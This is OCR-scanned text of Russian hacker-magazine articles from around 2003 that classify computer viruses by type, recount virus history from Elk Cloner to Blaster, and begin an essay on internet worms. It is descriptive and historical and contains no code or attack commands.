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вирус. Я пришел к тебе. Ведь ты же ждал меня, правда? 
Поздно чертыхаться и материться, я - ошибка матрицы. 
Пробой в твоей системе безопасности. Не 
расстраивайся, ты не один такой "счастливчик". 
Тревогу тоже объявлять не нужно, это всего лишь 
тренировочные учения. Войной пока не пахнет. Не 
бойся, я не причиню тебя вреда. Я просто потрогал тебя 
чуть-чуть. Тебя и твою систему :). Я маленький и 
добродушный. Ребенок, порожденный самим 
человечеством. Впрочем, если ты захочешь меня 
уничтожить, знай - я не один. Остальные на подходе. 
Причем они будут уже гораздо хитрее и злее меня... 
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Скрыпников Сергей aka Slam (sergey@soobcha.org) 


ЧЕМ ТЫ 
ЗАРАЗИЛСЯ? 


КЛАССИФИКАЦИЯ ВИРУСОВ 


я 


Cc егодня я расскажу тебе сказку о том, что же обозначает это таинственное и 
злобное слово "вирус", и какие вирусы бывают. Естественно, разговор будет 
идти только о компьютерных вирусах, если ты поймал другой, то вопрос не к нам :). 


d 


PART 1. WHO IS WHO 

В общем, я могу начать 
грузить тебя техническими 
терминами, но, думаю, лучше 
объяснить все на пальцах. 
"Компьютерный вирус - это программа (неко- 
торая совокупность выполняемого ко- 
да/инструкций), способная создавать свои 
копии (не обязательно полностью совпадаю- 
щие с оригиналом) и внедрять их в различ- 
ные объекты/ресурсы компьютерных систем, 
сетей и т.д. без ведома пользователя". Это 
самое "нормальное" определение, которое 
мне удалось найти, давай его разберем. Как 
ты уже понял, вирус - это программа (точно 
такая же, Kak, например, твой MS Word), кото- 
рая может изменять другие Cpanel, записы- 
вая в них свой код и делая их "зараженны- 
ми". Сейчас почти во всех вирусах заложен 
алгоритм размножения по Сети (по электрон- 
ной почте, через WEB ит.п.). Кстати, здесь - 
www.viruslist.com/viruslistbooks.html?id=6 - 
есть интересное определение для домохо- 
зяйки. Прочитай, и все сразу встанет на свои 
места. 


PART Il. А КАКИЕ ОНИ?! 
Вирусы принято делить на классы по сле- 
дующим основным признакам: 
среда обитания 
операционная система 
алгоритм работы 
объем причиненного вреда 


По среде обитания вирусы можно разделить на: 
©. файловые 
©. загрузочные 
9. макро 
@. сетевые 


По алгоритму работы: 
резидентные 

@. с использованием стелс-алгоритмов 

@. с самошифрованием и полиморфич- 
ностью 

@. с использованием нестандартных приемов 


По объему причиненного вреда: 

@. безвредные, т.е. никак не влияющие на 
работу компьютера 

@. неопасные, т.е. Te, которые просто себя 
распространяют, при этом, например, выдви- 
гая CD-ROM или мигая лампочками на клави- 
атуре 
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@. опасные, которые могут привести к 
серьезным сбоям в работе компьютера 

Ф. очень опасные, которые могут привести 
к потере программ, уничтожить данные, сте- 
реть необходимую для работы компьютера 
информацию, даже ту, которая находится в 
системной области данных! 


Классификацию вирусов по признаку того, в 
какой операционной системе они работают, A 
приводить не стал - ты и сам не маленький. 


PART Ill. ТЕПЕРЬ 0 КАЖДОМ 
ПОНЕМНОГУ 


ФАЙЛОВЫЕ ВИРУСЫ 

Файловые вирусы - это те, которые при 
своем размножении используют файловую 
систему определенной операционной системы. 
Чаще всего сфайловые вирусы заражают ис- 
полняемые сайлы; они могут внедряться и в 
другие типы файлов, но, как правило, запи- 
санные в таких файлах, они никогда не полу- 
чают управление и, следовательно, теряют 
способность к размножению (да, такие бес- 
толковые вирусы иногда тоже встречаются :). 


По способу заражения дайловые вирусы де- 
лятся на несколько групп: 

@. ОуегмгИтд-вирусы 

@. Паразитические 

@. Компаньон-вирусы 


Первый способ заражения является наибо- 
лее простым: вирус записывает свой код 
вместо кода заражаемого срайла, уничтожая 
его содержимое. Но дальше этого дело не 
идет, т.к. рано или поздно система начинает 
глючить или падает. А если у тебя есть анти- 
вирус, то Overwriting-Bupycb! обнаруживают- 
ся быстрее остальных. 

Паразитические вирусы добавляют свой код 
в зараженный срайл, срайл при этом остается 
полностью или частично работоспособным. 
К категории компаньон-вирусов относятся 
вирусы, не изменяющие заражаемые срайлы. 
Алгоритм их работы состоит в том, что для за- 
ражаемого срайла создается срайл-двойник, 
причем при запуске зараженного срайла уп- 
равление получает именно этот двойник. 


СЕТЕВЫЕ ВИРУСЫ 
Сетевыми называются такие вирусы, ко- 
торые при своем распространении использу- 


ют возможности интернета и локаль- 
ных сетей. 

Основным принципом работы сетевого 
вируса является возможность самостоя- 
тельно передать свой код на удаленный 
сервак и заставить его выполниться. 
Сетевые вирусы нередко называют се- 
тевыми червями. Для своего распрост- 
ранения они используют ошибки и не- 
документированные сфрункции сетей 
или ОСей, при этом распространяясь 
по сервакам и запуская свой код на 
каждом из них. 

Существует категория вирусов, кото- 
рые используют для своего распрост- 
ранения протокол ЕТР и передают 
свою копию на удаленный ftp-cepBep в 
каталог Incoming. Поскольку сетевой 
протокол ЕТР исключает возможность 
запуска срайла на удаленном серваке 
в каталоге Incoming, этот вирус можно 
охарактеризовать как "полусетевой". 
Его действие основано лишь на любо- 
пытстве пользователя. 


МАКРОВИРУСЫ 

Это вирусы на макроязыках раз- 
личных приложений, вроде MS Excel 
(VB), MS Word (WB) и т.п. 
Для своего размножения они исполь- 
зуют возможности макроязыков и с 
их помощью переносят себя из одно- 
го зараженного сфайла (документа 
или таблицы) в другие. 
Для существования вирусов в конк- 
ретной системе необходимо наличие 
встроенного в систему макроязыка с 
такими возможностями: 


- привязка программы на макроязыке 
к конкретному файлу; 


1МТЕМОЕО-ВИРУСЫ 


- копирования макропрограмм из OG- 
ного файла в другой; 

- получение управления макропрог- 
раммой без вмешательства пользова- 
теля (хотя бы прямого, вроде необхо- 
димости нажатия кнопки "запусти ме- 
ня, я вирус" :). 

Макроязык позволяет копировать 
файлы или перемещать макропрог- 
раммы в служебные сфайлы системы и 
редактируемые сфайлы, при откры- 
тии\редактировании\закрытии зара- 
женного файла. 

Чаще всего идет заражение стандарт- 
ного шаблона, который загружается 
при открытии нового документа, таким 
образом, все последующие копии 
файла тоже являются зараженными. 


ЗАГРУЗОЧНЫЕ ВИРУСЫ 
Загрузочные вирусы заражают 
загрузочный (boot) сектор флоппи- 
диска и Бос{-сектор или Master Boot 
Record (MBR) винчестера. Принцип 
действия прост: при включении или 
загрузке компьютера сначала прохо- 
дит тест оборудования, а потом, в зави- 
симости от настроек, считывается пер- 
вый физический сектор (будь то cpno- 
пик, сидюк или винчестер), и на него 
передается управление. 
При заражении дисков загрузочные 
вирусы подставляют свой код вместо 
какой-либо программы, получающей 
управление при загрузке системы. Ви- 
рус заставляет систему при перезапус- 
ке считать в память и отдать управле- 
ние не оригинальному коду загрузчи- 
ка, а коду вируса. 
Заражение срлопиков производится 
единственным известным способом - ви- 
рус записывает свой код вместо ориги- 
нального кода boot-cekTopa дискеты. 
Винчестер заражается тремя возможны- 
ми способами - вирус записывается либо 
вместо кода МВК, либо вместо кода boot- 
сектора загрузочного диска (обычно дис- 
ка C:), либо модифицирует адрес актив- 
ного boot-cekTopa в Disk Partition Table, 
расположенной в МВК винчестера. 
В вирусах семейства "Stoned" задей- 
ствован другой метод. Эти вирусы раз- 
мещают первоначальный загрузочный 
сектор в неиспользуемом или редко 
используемом секторе - в одном из 
секторов винчестера (если такие есть), 
расположенных между MBR и первым 
Боо[-сектором, а на дискете такой сек- 
тор выбирается из последних секто- 
ров корневого каталога. 
Вирусы семейства "Azusa" содержат в 
своем теле стандартный загрузчик 
МВК и при заражении записываются 
поверх оригинального МВК без его 
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САМЫЙ МАЛЕНЬКИЙ 


Ш Win95.Repus - вирус, кото- 
рый заражает РЕ файлы, запи- 
сываясь в неиспользуемую 
часть заголовка. Имеет 2 моди- 
фикации - размером 127 и156 
байт. Не очень-то это мало, ска- 
жешь ты и будешь прав. Но ви- 
рус, имеющий очень оригиналь- 
ный алгоритм заражения - че- 
рез кеш-память windows, и поэ- 
тому распространяющийся с ог- 
ромной скоростью этого заслу- 
живает. С ним может поспорить 
только известный Slammer aka 
Некегп размером 376 байт, ис- 
пользующий баг MS SQL 
Server. Но, поскольку Slammer 
не имеет тела, первое место ему 
не досталось. В принципе, су- 
ществуют вирусы еще мень- 
шей длины, но они обычно 
представляют собой старые 
сог-нерезиденты. В крайнем 
случае - глючные com-exe-TSR. 


САМЫЙ СЛОЖНЫЙ 


Ш Ml-Worm.Hybris, пожалуй, ca- 
мый сложный из современных ви- 
русов. Чувствуется, что прога сде- 
лана с любовью: вирь, состоящий 
из тела и подпрограмм-плагинов 
(которые он способен обновлять 
через инет), заражает 
WSOCK32.DLL, получая таким об- 
разом доступ к трафику юзера. 
Отправляя письма по выдранным 
из трафика адресам, он гарантиру- 
ет себе распространение. Работа с 
плагинами тоже вызывает уваже- 
ние - вирь коннектится к конфре- 
ренции alt.comp.virus и качает но- 
вые версии оттуда, обретая инте- 
ресные функции - заражение ap- 
хивов и PE файлов, алгоритмы 
шифровки тела перед отправкой 
письма и многое другое. Интерес- 
но, что при заражении ехе'шника 
не изменяется ни длина, ни, в не- 
которых случаях, CRC файла, что 
может обмануть некоторые проги- 
ревизоры. Но не ADinf, KOHe4HO ;). 
В общем, несмотря на наличие 
конкурентов из прошлого, первое 
место присуждается Хибрису. За 
волю к победе. 


Лозовский Александр 
(alexander@real.xakep.ru) 
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ИСТОРИЯ БОЛЕЗНИ 


омпьютерные вирусы 


сегодня - явление 


столь обыденное и 


Такое упо- 
минание от- 
носится к 
концу 60-х, 
- началу 
70-x годов, 
когда на 
машине 
Univac 1108 
появилась 
программа 
“Pervading 
Animal". 


привычное, что редко 

кто задумывается, по- 
чему эти формы жизни названы имен- 
но вирусами, а не, скажем, паразита- 
ми. Ответ прост: название позаим- 
ствовано из биологии, потому что 
жизненные циклы вирусов компью- 
терных и биологических совпадают - 
внедрение в программу/клетку и 
дальнейшее размножение. Однако 
прежде чем выяснять, где и когда по- 
явился первый вирус, было бы непло- 
хо узнать четкое определение терми- 
на "компьютерный вирус". Такое оп- 
ределение дал в 1986 году Фред Ко- 
эн: "Компьютерный вирус есть прог- 
рамма, способная заражать другие 
программы путем добавления в них 
собственной копии". Ф.Коэн вообще 
личность примечательная - первый 
человек в истории, защитивший док- 
торскую диссертацию по теме компь- 
ютерных вирусов. Он доказал невоз- 
можность написания программы, ко- 
торая, глядя на файл, могла бы co 
стопроцентной точностью сказать, ви- 
рус ли это. Теперь можно начинать 
копаться в истории вычислительной 
техники, отыскивая первое упомина- 
ние о программе, подходящей под оп- 
ределение Коэна. 


ОТ НАЧАЛА И ДО НАШИХ ДНЕЙ 


рис. Константин Комардин 


ПЕРВЫЙ 
и Такое упоминание относится к кон- 
цу 60-х - началу 70-х годов, когда на 
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машине Univac 1108 появилась прог- 
рамма "Pervading Animal". Собственно, 
вирусом ее назвать было нельзя, од- 
нако это была первая программа, вы- 
полнявшая не те действия, которых 
ожидал от нее оператор, и пытающая- 
ся создавать свои копии. Мысли о соз- 
дании саморазмножающихся прог- 
рамм начали приходить в голову неко- 
торым людям еще в конце 40-х, когда 
появилось несколько теорий, связан- 
ных с созданием таких программ. Og- 
нако первая успешная реализация от- 
носится лишь к концу 60-х годов. Дос- 
туп к ЭВМ в те годы имели немногие, 


писать программы для них могли лишь 
избранные, поэтому впереди у компь- 
ютерного сообщества было больше 
десяти лет спокойствия. 


Но вот в середине 80-х компьютеры, 
теперь уже персональные, становятся 
общедоступными. С тех пор и ведет 
свое начало вирусная история. 


ДРЕВНОСТЬ 


1981 
- Появляется вирус Elk Cloner, распро- 
страняющийся на дискетах для Apple 


|. Вирус выводит Ha экран следующие 
строчки: 

К will get оп all your disks 

It will infiltrate your chips 

Yes it's Cloner! 


It will stick to you like glue 

It will modify ram too 

Send in the Cloner! 

Elk Cloner считается первым в истории 
компьютерным вирусом. 

- В том же году Mpeg Коэн начинает 
работу в области исследования само- 
размножающихся программ. 


1983 

- В рамках работы Коэна "Сотрщег 
Viruses - Theory and Experiments" no- 
является первый экспериментальный 
вирус. 

- И именно в этом году появляется 
сам термин "компьютерный вирус", 
предложенный Леном Адлеманом. 


1986 

- Имена этих братьев знакомы каждо- 
му антивируснику, запомни их и ты: 
Basit и Amjad (как это звучит по-рус- 
ски, я не знаю :)). Два пакистанских 
программиста, владеющих компанией 
Brain Computer Services, создают ви- 
pyc Brain - первый вирус для MS-DOS. 
Brain был загрузочным вирусом, и, по- 
пав в память при запуске компьюте- 
ра, заражал Боо{-сектор всех вставля- 
емых 360-килобайтных дискеток. Вся 
его полезная нагрузка заключалась в 
том, что зараженные дискеты имели 
метку "(с) Brain". Вирус сразу же про- 
являл себя, поэтому крупномасштаб- 
ной эпидемии он не вызвал. К тому 
же, после того как дискеты на 360 Кб 
ушли в прошлое, вирус стал бесполе- 
зен. Но на базовом коде этого вируса 
было создано целое семейство виру- 
сов, не все из которых были так же 
безобидны, как Brain. Зачем братьям 
понадобилось писать и распростра- 
нять вирус? Существует много точек 
зрения, но большинство экспертов 
склоняются к мысли, что идея с виру- 
сом - просто рекламный ход, призван- 
ный привлечь внимание к небольшой 
пакистанской компании. Ведь в коде 
вируса содержались имена авторов и 
их адрес! О, наивное время :). 

- В том же 1986 году Ральф Бургер пи- 
шет безвредный демонстрационный 
вирус VIRDEM, заражающий *.com- 
файлы, и представляет ero общест- 
венности. Интерес к теме столь велик, 
что Бургеру приходится писать книгу, 
посвященную вирусам. 


1987 

- Появляется вирус Lehigh. Не npegc- 
тавляя собой ничего особенного (за- 
ражает только Command.com, портит 
ГАТ), он, тем не менее, занимает в ви- 
русной истории довольно заметное 
место из-за следующего технического 
момента: сам вирус нерезидентный, 
HO т.к. он заражает Command.com, ко- 
торый остается в памяти резидентно, 


то и сам Lehigh считается первым в 
мире резидентным вирусом. 

- В это же время один за другим появ- 
ляются три вируса группы SURIV (про- 
читай наоборот): первый заражает 
*.сот-файлы, второй - *.ехе, третий - 
оба типа. Причем SURIV-O2 был nep- 
вым в мире ЕХЕ-инфректором. Четвер- 
тым членом семейства SURIV являет- 
ся знаменитый Jerusalem. Вирус зара- 
жал и *.сот, и *.ехе-сфайлы, но не тро- 
гал command.com, т.к. после Lehigh, 
люди стали внимательнее относиться 
к этому файлу. Jerusalem был безоби- 
ден большую часть времени, но в пят- 
ницу, выпадающую Ha 13 число, вирус 
стирал все зараженные файлы. Пер- 
вые версии Jerusalem содержали 
ошибку - вирус повторно заражал 
уже зараженные им сфайлы, из-за это- 
го они не получили распространения, 
но следующие вирусы семейства уже 
были избавлены от этого бага. С этим 
вирусом вообще связано много инте- 
ресных баек. Например, почему 
Jerusalem известен также как Israeli 
(Израильский), 1813 и IDF? Изначаль- 
но вирус именовался Israeli, по месту 
обнаружения, потом антисемитское 
название сменили на 1813, так как 
именно столько байт он занимал. Ис- 
пользовалось также другое название 
- IDF, означавшее Israeli Defence 
Forces (Израильские Защитные Войс- 
ка), в одном из отделений которых 
был обнаружен вирус. И, в конце кон- 
цов, вирус назвали красивым именем 
Jerusalem. 

- В этом же году появляются знамени- 
тые Stoned (первый МВБ-инфектор) и 
Vienna. Бургер дизассемблирует Виен- 
HY и дает исходник в своей книге 
"Computer Viruses: А High-Tech 
Disease". 


ривает наказания за подобные прес- 
тупления, поэтому Моррис отделался 
десятитысячным штрафом и работами 
по восстановлению систем, постра- 
давших от его червя. Компьютерное 
сообщество, наконец, понимает масш- 
табы угрозы, и для предотвращения 
подобных случаев создается органи- 
зация CERT (Computer Emergency 
Response Team), существующая и ак- 
тивно действующая до сих пор 
(www.cert.org). 


- IBM обнаруживает в своих сетях ви- 
рус Cascade и в связи с этим начинает 
заниматься антивирусными исследо- 
ваниями. 

- Также этот год знаменателен тем, что 
некий индонезийский программист 
публикует программу, чистящую дис- 
кеты от вируса Вгат и предохраняю- 
щую от этого вируса в дальнейшем. 
Т.о. эта программа считается одним из 
первых, если не первым, антивирусом. 


1989 

- Под давлением клиентов, IBM pacn- 
ространяет антивирус, который go 
этого использовался исключительно 
внутри компании. 


РАСЦВЕТ 


1990 

- Знаешь, что такое SPAM? Нет, это не 
предложения "заработать $$$$" и пр. 
SPAM - это Stealth Polymorph Armored 
Multipartite. 

Stealth (стелс, невидимость) - способ- 
ность вируса заражать файлы скрыт- 
но, не давая пользователю повода за- 
подозрить неладное; 

Polymorph (полиморфизм) - способ- 
ность вируса шифровать свое тело 


Stealth (стелс, невидимость) - способность 
вируса заражать сфайлы скрытно, не давая 
пользователю повода заподозрить неладное 


1988 

- Роберт Моррис пишет своего знаме- 
нитого червя. Первый в истории слу- 
чай, когда компьютерная программа 
причинила реальный многомиллион- 
ный ущерб. Закон еще не предусмат- 


ES 
2. 238 
aad = - 


Тот самый CERT 


так, чтобы никакие две копии вируса 
не были похожи друг на друга; 
Armored (защита, бронирование) - 
способность вируса сопротивляться 
отладке и дизассемблированию; 
Multipartite (многосторонность) - спо- 
собность вируса заражать и програм- 
мы, и загрузочные сектора дисков. 
Вот такие веселые техники появились 
в начале 90-х. Каждая из них по от- 
дельности крайне затрудняет жизнь 
как простого пользователя, так и ан- 
тивирусника, представь, какой на- 
пастью были вирусы, применявшие 
сразу несколько этих методик! 

- В Болгарии открывается первая в 
мире VX-BBS. Вообще, Болгария и 
Россия внесли довольно значитель- 
ный вклад в дело развития вирмейке- 
рства. Так вот, на болгарской ВВ$ лю- 
бой желающий мог слить себе деся- 


ток новых вирусов и отправить их ку- у 


Известней- 
ший вир- 
мейкер Dark 
Ауепдег вы- 
пускает МЕ 
(Mutation 
Engine) - 
полиморф- 
ный дви- 
жок. С по- 
мощью это- 
го движка 
любой ви- 
рус можно 
превратить 
в полимо- 
рфный, 
просто 
слинковав 
его с MtE. 


1995. Рабо- 
Ta Hag 
Windows95 
практически 
завершена, 
тестерам 
рассылают- 
ся бета- 
версии. Все 
диски с 
Win95.Beta 
заражены 
вирусом 
Рогт. 
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да угодно. Открываются конференции 
Usenet, посвященные написанию ви- 
русов, публикуются документы, в ко- 
торых матерые вирмейкеры делятся 
опытом. Публикуется книга Марка 
Людвига "Маленькая Черная Книжка 
о Компьютерных Вирусах". Вкупе с 
книгой Ральфа Бургера и руковод- 
ством по MS-DOS, у рядового програм- 
миста есть все необходимое для стар- 
та Ha \/Х-сцене. Вирмейкерство возво- 
дится в ранг искусства, создаются \/Х- 


юзер, способный кликать мышкой, мо- 
жет создать серьезный разрушитель- 
ный вирус. С одной стороны, для анти- 
вирусников наступает сущий кошмар, 
но с другой - эпоха благоденствия, ан- 
тивирусный бизнес процветает. 

- Тогда же выходят еще два конструк- 
тора вирусов: PS-MPC (Phalcon/Skism 
Mass-Produced Code Generator) и G2 
OT той же группы. Касперский говорит, 
что на его складе хранятся несколько 
сотен вирусов, сгенерированных С2 и 


Вирмейкерство возводится в ранг искусства, 
создаются \Х-группы. И одновременно 
(или поэтому) начинается эра 
глобального вирусов 


группы. И одновременно (или поэто- 
му) начинается эра глобального расп- 
ространения вирусов. В ответ на это 
возникает антивирусная индустрия. 
Сканеры, сторожа и пр. существовали 
и раньше, но сейчас за дело берутся 
тяжеловесы - Symantec выпускает 
Norton AntiVirus. 

- В Tom же 1990 году выходит 32-бит- 
ная OC Apple System 7.0, пользовате- 
ли которой полностью защищены OT 
старых 16-битных вирусов. A до выхо- 
да Win95 еще целых пять лет :). Viva 
la Microsoft! 


1991 

- С появлением Chameleon начинается 
эпоха полиморфных вирусов. Первый 
же удачный полиморф Tequila вызы- 
вает настоящую эпидемию. И все бы 
ничего, но на сцену (во всех смыслах) 
выходят такие личности, как Nowhere 
Man, Dark Avenger, Dark Angel и gp. 


1992 

- Известнейший вирмейкер Dark 
Avenger выпускает МЕ (Mutation 
Engine) - полиморфный движок. В 
поставку входит *.оБ]-файл и краткое 
руководство. С помощью этого движ- 
ка любой вирус можно превратить в 
полиморорный, просто слинковав его 
c MtE. 

- Nowhere Man не отстает и создает 
VCL (Virus Creation Laboratory или 
Viral Construction Laboratory) - 
конструктор вирусов и NED (Nuke 
Encryption Device) - шифровальный 
модуль, который можно использовать 
в любом вирусе. 

- Dark Angel пишет DAME (Dark Angel 
Multiple Encryptor) - еще один удач- 
ный полиморорный движок. 

- И, наконец, VX-rpynna Trident выпус- 
кает TPE (Trident Polymorphic Engine). 
- Выходит Windows 3.1 и тут же, сле- 
дом, первый вирус nog нее - WinVer 
1.4, заражающий МЕ-сфайлы. 


1993 

- За год выходит несколько новых 
версий вышеперечисленных прог- 
рамм-конструкторов, и теперь любой 
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VCL, и больше тысячи, созданных при 
помощи PS-MPC. 

- Антивирусные компании разрабаты- 
вают успешные методы борьбы с по- 
лиморсрами, но появляется другая 
проблема - сканер определяет как по- 
лиморофные вирусы многие програм- 
мы, вирусами не являющиеся. Так что 
go победы Hag полиморфизмом еще 
далеко. 

- Появляется несколько оригинальных 
вирусов. Например, Cruncher, архиви- 
рующий зараженные им программы. 


1994 

- В Англии появляется вирус 
Pathogen. И ничего примечательного 
в этом событии не было бы, если бы 
не тот факт, что автор был найден и 
арестован. Это одно из первых уго- 
ловных дел, связанных с вирусами. 

- Также в 1994 году появляется изве- 
стнейший представитель рода виру- 
сов - One Half, который я до сих пор 
встречаю на некоторых компьютерах. 


ли go тех пор, пока через несколько 
месяцев после релиза не был обнару- 
жен вирус, названный исследователя- 
ми Concept. Вирус был написан на 
WordBasic'e - встроенном языке MS 
Word'a. Т.о. Concept стал первым мак- 
ровирусом в истории. Антивирусники 
и Misrosoft этого не ожидали. Если за 
десять лет, прошедшие со времен 
Вгат'а, техника борьбы с файловыми 
и загрузочными вирусами была отто- 
чена, то теперь борцы за чистоту 
компьютеров столкнулись с совер- 
шенно новой концепцией построения 
вирусов. 

- Вирмейкеры продолжают изощрять- 
ся: появляются ВАТ-вирусы. 


1996 

- Второй удар по самоуверенности 
Гейтса. Появляется вирус Волга, прек- 
расно заражающий \\п95-системы. 
Да и стоит ли говорить, сколько но- 
вых макровирусов появилось за год? 
Одного MS Word'a им уже мало - 
Laroux, например, заражает Ехсе!евс- 
кие таблицы! 

- Вирмейкеры начинают мечтать о 
RingO-sBupycax, а так как единствен- 
ным документированным способом 
воспользоваться сервисами нулевого 
кольца является написание VXD, то 
вскоре такой вирус появляется, и имя 
ему - Punch. Используя \/хО-сервисы, 
Punch перехватывает все обращения 
к файловой системе. 


1997 

- Появляется Bliss - вирус под Линукс. 
Точка. 

- Также в этом году появляются но- 
вые типы червей: ftp- и п!РС-черви. 

- Происходит очередной раунд схватки 
McAfee vs Dr.Solomon. Антивирусные 
продукты тестируются по двум OCHOB- 
ным признакам: скорости сканирования 


Скорость обычно замеряется на проверке 
практически чистого диска с парой вирусов, 
а количество обнаруживаемых вирусов - 
на огромной коллекции разнообразных вирей 


НОВЫЕ ГОРИЗОНТЫ 


1995 

- Работа над Windows95 практически 
завершена, тестерам рассылаются бе- 
та-версии. Все диски с Win95.Beta за- 
ражены вирусом Гогт. Репутация 
Microsoft как надежного производите- 
ля ПО ощутимо крепнет :). Но вот, на- 
конец, выходит окончательная версия 
Windows95, на релизе которой Гейтс 
заявляет, что с вирусной угрозой по- 
кончено - по его словам, новая плат- 
форма полностью защищена от лю- 
бых типов вирусов. Подтверждения 
того, как сильно она защищена, мы 
видим каждый день на сайте Касперс- 
кого :). Но тогда в неуязвимость новой 
системы действительно верили. Вери- 


и количеству обнаруживаемых виру- 
сов. Скорость обычно замеряется на 
проверке практически чистого диска с 
парой вирусов, а количество обнаружи- 
ваемых вирусов - на огромной коллек- 
ции разнообразных вирей. Так вот 
McAfee обвинила Доктора Соломона в 
следующем злодеянии: антивирус от 
Соломона, определив, что работает над 
коллекцией, а не над обычном диском, 
переключается в режим более тща- 
тельного сканирования, чем обычно, 
что снижает скорость, но увеличивает 
показатель "выявляемости". По словам 
McAfee, только благодаря такому трю- 
ку, Ог.5оюгпоп'овский антивирь нес- 
колько раз выходил на первые позиции 
в рейтингах. Соломоновцы, в свою оче- 
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Гигант, купивший Доктора Соломона 


пользователей стоит Acrobat Reader, 
а не просто Acrobat, заражения чер- 
вем немногочисленны. 


2002 

- Если раньше вирмейкеры тратили 
время на изобретение различных тех- 
ник защиты кода вируса или ориги- 
нальных методик заражения, то те- 
перь акцент сместился в сторону на- 
писания совершенно нетрадиционных 
вирусов, вроде следующих: 

LFM-926 - вирус, заражающий *.swf- 
файлы (Shockwave Flash). 

Sharp-A - первый .МЕТ вирус, написан- 
ный на СЗ. 

SQLSpider - червь Ha JavaScript, зара- 
жающий системы с запущенным MS 
SQL Server. 


2003 

- Появляется несколько любопытных 
вирусов и червей, среди них: 
MBA-First - вирус, заражающий табли- 
цы программы MapInfo. Написан вирус 


редь, придрались к рекламному лозун- 
гу MacAfee. Конкуренция, понимаешь. 


1998 

- В крышку гроба Win9x забивается 
последний гвоздь - появляется СН. 
Уход в RingO, перепрошивка Flash 
BIOS, перехват всех обращений к 
срайловой системе, периодическое 
стирание всей информации на диске - 
вот краткий перечень достоинств 


Поддержи отечественного производителя! 


WIN95.CIH :). НАШИ ДНИ 
- Тогда же появляются первые поли- 
морорные \\/п9х-вирусы и Strange 2000 


Brew - первый Java-Bupyc. 
- Компания McAfee покупает компа- 
нию Dr.Solomon. Бой окончен. 


1999 

- В Сети обнаружен макровирус 
Melissa, побивший все рекорды по 
скорости заражения. Melissa успешно 
сочетает методы действия сетевого 
червя, рассылая себя всем людям, за- 
несенным в адресную книгу Outlook, и 
макровируса - заражая \\ога'овские 
документы. 


- ILOVEYOU aka LoveBug. Червь, по- 
дозрительно похожий на Мелиссу. Ви- 
русы Ha VBScript приобретают неви- 
данную популярность. 

- Liberty - первый вирус, вернее, троян 
под Palm OS. Мобильники на очереди! 


2001 

- Кроме эпидемий таких вирусов, как 
CodeRed и SirCam, год знаменателен 
появлением PeachyPDF-A - червя, 
распространяющегося через PDF-go- 
кументы. Но так как у большинства 


w W W 


ЛИНКИ 


По идее, сейчас надо бы дать кучу ссылок, но дело в том, что на лю- 
бом антивирусном сайте есть раздел, посвященный истории виру- 
сов. Короче говоря, сюда ходи: 

Ш www.cert.org - существует со времен червя Морриса, заслужил 
почет и доверие. 


Ш www.kaspersky.ru - существует немного :) меньше, но наш, 
отечественный, значит, хороший. 

Ш www.cknow.com - Computer Knowledge. Есть хороший раздел об 
истории вирусов. При написании статьи я активно пользовался 
этим ресурсом. 

Ш www.google.com - самый главный твой друг. Бартерный принцип: 
даешь ему имя вируса, получаешь взамен кучу ссылок. 


С 


на встроенном языке программы - 
MapBasic. 

TrojanProxy.Win32.Zebroxy - троян, поз- 
воляющий хозяину использовать за- 
раженную машину как прокси-сервер. 
Lovesan aka Lovsan aka Blaster aka 
Msblast aka Poza - обыкновенный 


: Раздали Ha- 
червь gna МТ-систем, получивший роду ору- 
широкое распространение этим ле- re chorus 
том (2003). Я сам пару дней назад тесь. 


прихлопнул файл msblast.exe на 
своей машине :). 


ЧТО НАС ЖДЕТ? 

m Да ничего хорошего. Если в кон- 
це 80-х годов, с тогдашним уровнем 
развития коммуникаций и малой 
распространенностью персональ- 
ных компьютеров, вспыхивали са- 
мые настоящие эпидемии, то что же 
говорить о дне нынешнем, когда 
каждый школьник имеет доступ к 
компьютеру, зачастую подключен- 
ному к Сети, когда интернет превра- 
тился из технической библиотеки 
для специалистов в вещь, почти 
столь же привычную, как телеви- 
зор. Через несколько месяцев пос- 
ле выхода новой технологии или 
платформы под нее появляется ви- 
рус. Через пару дней после обнару- 
жения уязвимости в каком-либо се- 
тевом софте выходит простенький 
VBS-4epBb, использующий эту уяз- 
вимость. Раздали народу оружие, 
теперь не обижайтесь. ac 


СЪЕДЯТ ЛИ ЧЕРВИ ИНТЕРНЕТ? | 


TanaT (tanat@hotmail.ru) 


СЪЕДЯТ ЛИ 
ЧЕРВИ ИНТЕРНЕТ? 


НАСКОЛЬКО ОПАСНЫ СОВРЕМЕННЫЕ ИНТЕРНЕТ-ЧЕРВИ 


ЧЕРВЯК Е 
ОБЫКНОВЕННЫЙ 
m= Вирусы (а также 
трояны, бэкдоры и т.п.) 
сейчас у всех на слуху. 
Черви, однако, это разговор особый. 
В отличие от классических вирусов, 
средой обитания червей является 
Сеть. Цель вируса - заразить как 
Но чего все 3 
боятся? можно больше файлов на компьюте- 
Прежде все- ре, а червя - максимальное количест- 
го, того, 4TO во систем в Сети. К этому могут 90- 
интернет 
упадет. На бавляться более прозаические зада- 
ей чи (потереть информацию, выкрасть 
может, на- и отослать данные и T.g.). Современ- 
совсем. Ду- ные черви обладают функциональ- 
Meo Hers HOCTbIO и огромного количества стан- 
Точно так дартных вирусов: они поражают 
и файлы, оперативную память, загру- 
кораблю - зочные сектора. Именно потому, что 
большое червь - это больше, чем вирус, и его 
плавание, 
так и гло- стоит серьезно опасаться. 
бальной се- Взглянем на проблему шире. Черви - 
Ganbmemi ко- = ЭТО единственный вид вредоносного 
нец :). кода, который вызывает у пользова- 
телей и экспертов тревогу за буду- 
щее. Но чего все боятся? Прежде = 
всего, того, что интернет упадет. На $ 
день или неделю. А может, насовсем. g 
Пустые слова? Нет. Точно так же, как = 
большому кораблю - большое плава- 8 
ние, так и глобальной сети - глобаль- 5 
ный конец :). Интернет - это сложная g 
система, которую вполне реально “ 
поставить на колени. Еще пару лет от своей (своего) коллеги? Это пси- 
назад об этом не могло быть и речи, хология. Психология прошлого. Се- 
< но сегодня случилось страшное: поя-  годня она никому не интересна. Этот 
вились черви, эксплуатирующие ту прием можно сравнить со стрельбой 
i или иную дыру в системе безопас- из пушек ядрами. Когда кавалерия 
ности ПО и размножающиеся за счет наступает, это неплохой способ пок- 
ыы этого с невероятной скоростью. То рошить вражеских всадников. Но на 
есть проблема "пользователя, кото- дворе третье тысячелетие - компью- 
as 


al 


Потери мировой экономики от вирусов (в млрд. долларах). 
По данным "Лаборатории Касперского" 


ХАКЕРСПЕЦ 
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рому надо что-то впаривать" уже 
сошла на нет. 

Помнишь старого-престарого червя - 
LoveLetter? Этот червь буйствовал в 
течение лишь одного месяца, но вни- 
